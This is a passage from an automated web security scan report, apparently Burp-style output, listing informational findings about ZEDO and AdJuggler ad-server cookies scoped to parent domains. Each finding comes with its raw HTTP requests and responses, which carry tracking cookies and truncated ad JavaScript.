Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; aps=2; ZFFAbh=749B826,20|1483_759#365; FFad=32:15:42:23:13:18:2:1:1:0; ZCBC=1; ZEDOIDX=29; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:29,26,1:21,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; FFcat=826,187,14:951,11,14:826,187,9:951,7,9:951,7,14:951,2,9:951,2,14:826,187,7:951,7,7:1220,101,9; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:14,26,1:10,26,1; FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 6
Content-Type: application/x-javascript
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021:0,0|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:14,26,1:10,26,1:0,26,0;expires=Mon, 28 Feb 2011 05:25:30 GMT;path=/;domain=.zedo.com;
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
X-Varnish: 2884195688
Cache-Control: max-age=2286960
Expires: Thu, 24 Feb 2011 16:41:30 GMT
Date: Sat, 29 Jan 2011 05:25:30 GMT
Connection: close



10.47. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.4060885983053595 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZCBC=1; FFgeo=5386156; aps=2; ZFFAbh=749B826,20|1483_759#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:6,26,1:0,26,1; FFpb=1220:4f791'$951:appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; FFcat=826,187,14:951,7,14:826,187,9:951,2,9:951,11,14:951,7,9:951,2,14:826,187,7:951,7,7:1220,101,9; FFad=11:4:19:9:5:9:0:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:7,26,1:6,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:2,26,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,2,9:826,187,14:951,7,14:951,11,14:951,7,9:951,2,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=20:10:11:4:5:9:0:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:6,26,1:1,26,1;expires=Sun, 27 Feb 2011 23:16:42 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFgeo=5386156;expires=Sat, 28 Jan 2012 23:16:42 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=128
Expires: Fri, 28 Jan 2011 23:18:50 GMT
Date: Fri, 28 Jan 2011 23:16:42 GMT
Connection: close
Content-Length: 2313

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='appnexus300x
...[SNIP]...

10.48. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. A cookie whose Domain attribute names a parent of the issuing host is sent to, and can be overwritten by, every host under that parent, so the severity depends entirely on what the cookie carries. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=7/2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.3788897015620023 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZCBC=1; aps=2; ZFFAbh=749B826,20|1483_759#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647,196646:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:14,26,1:14,26,1; PI=h1037004Za883604Zc826000187,826000187Zs173Zt128; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:43,26,1:30,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; FFcat=826,187,14:951,11,14:951,7,14:826,187,9:951,2,9:951,7,9:951,2,14:826,187,7:951,7,7:1220,101,9; FFad=43:20:19:57:27:29:2:1:1:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,7,9:826,187,14:951,11,14:951,7,14:951,2,9:951,2,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=58:30:43:20:19:27:2:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:30,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1;expires=Mon, 28 Feb 2011 03:21:37 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFgeo=5386156;expires=Sun, 29 Jan 2012 03:21:37 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=114
Expires: Sat, 29 Jan 2011 03:23:31 GMT
Date: Sat, 29 Jan 2011 03:21:37 GMT
Connection: close
Content-Length: 2537

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='spectrum728x
...[SNIP]...

10.49. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=7/2&a=0&f=&n=951&r=13&d=14&q=&$=&s=2&z=0.05526216677390039 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Middle&page=bh.heraldinteractive.com/blogs/news/lone_republican
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; aps=2; ZFFAbh=749B826,20|1483_759#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647,196646:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:14,26,1:14,26,1; PI=h1037004Za883604Zc826000187,826000187Zs173Zt128; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 13:39:46 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,187,14:951,7,14;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647,196644:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 13:39:46 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=54
Expires: Sat, 29 Jan 2011 13:40:40 GMT
Date: Sat, 29 Jan 2011 13:39:46 GMT
Connection: close
Content-Length: 4378

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCusto
...[SNIP]...

10.50. http://d7.zedo.com/bar/v16-401/d3/jsc/gl.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/gl.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-401/d3/jsc/gl.js HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1302;c=69;s=12;d=9;w=300;h=250;l=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFad=0:0; FFcat=1220,167,14:1220,101,9
If-None-Match: "812b9ff1-5d7-4989a5a58d7c0"

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 399
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Sat, 28 Jan 2012 16:41:44 GMT;domain=.zedo.com;path=/;
ETag: "81ee0db6-5d7-4989a5a58d7c0"
Vary: Accept-Encoding
X-Varnish: 2233581894 2233581891
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=370269
Expires: Tue, 01 Feb 2011 23:32:53 GMT
Date: Fri, 28 Jan 2011 16:41:44 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var zzl='en-US';


if(typeof zzGeo=='undefined'){
var zzGeo=254;}
if(typeof zzCountry=='undefined'){
var zzCountry=255;}
if(typeof
...[SNIP]...

10.51. http://d7.zedo.com/img/bh.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/bh.gif?n=826&g=20&a=1483&s=$t&l=1&t=i&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://redcated/ADO/iview/278612752/direct;wi.1;hi.1/01?click=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; aps=2; FFpb=1220:4f791'$951:ibnetwork300x250; FFcat=826,187,9:951,2,9:951,7,9:1220,101,9; FFad=3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1
If-None-Match: "6ae02bae-7054-4942082502f40"

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 88
Content-Type: image/gif
Set-Cookie: ZFFAbh=749B826,20|1483_759#365;expires=Sat, 28 Jan 2012 21:57:38 GMT;domain=.zedo.com;path=/;
ETag: "199804b-7054-4942082502f40"
X-Varnish: 1435724280 1435712339
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30441
Expires: Sat, 29 Jan 2011 06:24:59 GMT
Date: Fri, 28 Jan 2011 21:57:38 GMT
Connection: close

GIF89a.............!.......,...........D..;

10.52. http://d7.zedo.com/utils/ecSet.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js?v=PI=h1037004Za883605Zc826000187%2C826000187Zs173Zt128&d=.zedo.com HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZCBC=1; aps=2; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:38,26,1:24,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; FFcat=826,187,14:951,7,14:826,187,9:951,7,9:951,2,9:951,11,14:951,2,14:826,187,7:951,7,7:1220,101,9; FFad=35:15:52:27:24:16:2:1:1:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:14,26,1:14,26,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: PI=h1037004Za883605Zc826000187,826000187Zs173Zt128;expires=Mon, 28 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "3a9d5cb-1f5-47f2908ed51c0"
Vary: Accept-Encoding
X-Varnish: 2807523739
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=3419
Date: Sat, 29 Jan 2011 02:23:29 GMT
Connection: close



10.53. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ajcmp=20236X631Sh003KAA; optin=Aa; i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;

Response

HTTP/1.1 302 Moved Temporarily
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC"
Location: http://
Server: JBird/1.0b
Date: Fri, 28 Jan 2011 16:46:03 GMT
Connection: close
Set-Cookie: c=201003Jhk3Ji23Jhj0000-N81mUzJ_0VX17742830124_358090_2FX10137980545300003K99;Domain=.rotator.hadj7.adjuggler.net;Max-Age=2592000;expires=Sun, 27 Feb 2011 16:46:03 GMT;Path=/servlet/ajrotator/track/pt63693


10.54. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/vj

Summary

